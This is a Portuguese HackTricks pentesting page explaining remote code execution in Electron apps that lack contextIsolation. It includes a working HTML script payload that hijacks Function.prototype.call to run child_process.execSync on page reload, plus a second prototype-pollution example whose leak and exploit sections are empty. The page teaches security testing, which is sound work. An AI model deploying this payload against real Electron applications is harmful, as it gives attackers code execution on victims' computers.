hacktricks/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md

4.4 KiB

Execução remota de código (RCE) via contextIsolation do Electron

Aprenda hacking na AWS do zero ao avançado com htARTE (HackTricks AWS Red Team Expert)!

Exemplo 1

Exemplo de https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41

O ouvinte de evento "exit" é sempre definido pelo código interno quando o carregamento da página é iniciado. Este evento é emitido logo antes da navegação:

process.on('exit', function (){
for (let p in cachedArchives) {
if (!hasProp.call(cachedArchives, p)) continue
cachedArchives[p].destroy()
}
})

{% embed url="664c184fcb/lib/common/asar.js (L30-L36)" %}

8a44289089/bin/events.js (L156-L231) -- Já não existe

Em seguida, segue aqui:

Onde "self" é o objeto de processo do Node:

O objeto de processo tem referências para a função "require":

process.mainModule.require

Como o handler.call vai receber o objeto process, podemos sobrescrevê-lo para executar código arbitrário:

<script>
Function.prototype.call = function(process){
process.mainModule.require('child_process').execSync('calc');
}
location.reload();//Trigger the "exit" event
</script>

Exemplo 2

Obtenha o objeto require da poluição de protótipos. De https://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81

Vazamento:

Exploração:

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!